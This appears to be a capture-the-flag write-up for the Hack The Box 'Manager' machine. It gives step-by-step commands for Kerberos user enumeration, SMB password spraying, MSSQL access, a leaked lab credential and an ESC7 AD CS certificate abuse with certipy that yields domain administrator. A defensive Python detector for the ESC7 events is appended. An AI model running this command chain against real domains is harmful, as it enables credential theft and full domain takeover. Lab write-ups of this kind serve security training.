Manager

 
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
49667/tcp open  unknown
49691/tcp open  unknown
49693/tcp open  unknown
49695/tcp open  unknown
49707/tcp open  unknown
53,80,88,135,139,445,464,593,1433,3268,3269,5985,49667,49691,49693,49695,49707
echo "10.129.42.4 manager.htb dc.manager.htb" >> /etc/hosts
 
All inaccessible.
kerbrute userenum -d manager.htb --dc dc.manager.htb /opt/useful/SecLists/Usernames/xato-net-10-million-usernames.txt >>users
cat users | grep VALID | awk -F '@' '{print $1}'| awk -F ':' '{print $4}' | tr -d '\t ' >> userlist
crackmapexec smb manager.htb -u userlist -p userlist
Got an SMB credential:
operator:operator
Try to connect to MSSQL:
mssqlclient.py -port 1433 manager.htb/operator:operator@manager.htb -windows-auth
Try to inject commands:
EXEC xp_dirtree 'C:\inetpub\wwwroot', 1, 1;
wget manager.htb/website-backup-27-07-23-old.zip
Got a credential:
raven:R4v3nBe5tD3veloP3r!123
Gain initial access:
Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeMachineAccountPrivilege is enabled
Most of the time Certify.exe is not present on the server machine; in my case it was not present.
To find vulnerable certificate templates:
./Certify.exe find /vulnerable
pip3 install certipy-ad
certipy find -vulnerable -stdout -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.100.121
 
There is a glitch with the HTB server; I'm going to try to reset it later.
certipy find -vulnerable -stdout -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.134.19
or
./Certify.exe find /vulnerable
again
Search for the ESC7 exploit and follow it:
certipy ca -ca 'manager-DC01-CA' -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
certipy ca -ca 'manager-DC01-CA' -enable-template SubCA -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123'
 
certipy req -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -template SubCA -upn 'administrator@manager.htb'
certipy ca -ca 'manager-DC01-CA' -issue-request 13 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
certipy req -username 'raven@manager.htb' -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target manager.htb -retrieve 13
certipy auth -pfx administrator.pfx -username administrator -domain manager.htb -dc-ip 10.129.134.19
Log in with the retrieved credential.
Got the administrator!
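
Added example, not part of the original writeup: a defender-side check for the ESC7 sequence above (CA permissions changed, a denied request later issued, a UPN that differs from the requester) over AD CS audit events 4882, 4888 and 4887. The record layout, the field names and the alice entry are constructed and hypothetical; real events have to be parsed from the CA's Security log with CA auditing enabled.

```python
# Added example. AD CS audit event IDs (CA auditing must be enabled):
# 4882 = CA security permissions changed, 4888 = request denied,
# 4887 = request approved and certificate issued.
CA_PERMS_CHANGED, REQUEST_DENIED, CERT_ISSUED = 4882, 4888, 4887

# Constructed sample records in chronological order. Field names are
# hypothetical; real events must be parsed from the CA's Security log.
EVENTS = [
    {"id": 4882, "actor": "raven@manager.htb"},
    {"id": 4888, "request_id": 13, "requester": "raven@manager.htb",
     "subject_upn": "administrator@manager.htb"},
    {"id": 4887, "request_id": 13, "requester": "raven@manager.htb",
     "subject_upn": "administrator@manager.htb"},
    {"id": 4887, "request_id": 14, "requester": "alice@manager.htb",
     "subject_upn": "alice@manager.htb"},  # benign, constructed user
]


def account_name(principal):
    """Normalize 'DOMAIN\\user' or 'user@domain' to a lowercase 'user'."""
    return principal.split("\\")[-1].split("@")[0].lower()


def find_suspicious_issuances(events):
    """Return [(request_id, [reasons])] for issued certificates worth review."""
    perm_changers, denied, findings = set(), set(), []
    for ev in events:
        if ev["id"] == CA_PERMS_CHANGED:
            perm_changers.add(account_name(ev["actor"]))
        elif ev["id"] == REQUEST_DENIED:
            denied.add(ev["request_id"])
        elif ev["id"] == CERT_ISSUED:
            requester = account_name(ev["requester"])
            reasons = []
            if ev["request_id"] in denied:
                reasons.append("issued after denial")
            if account_name(ev["subject_upn"]) != requester:
                reasons.append("UPN differs from requester")
            if requester in perm_changers:
                reasons.append("requester changed CA permissions")
            if reasons:
                findings.append((ev["request_id"], reasons))
    return findings


if __name__ == "__main__":
    for request_id, reasons in find_suspicious_issuances(EVENTS):
        print(f"request {request_id}: {', '.join(reasons)}")
```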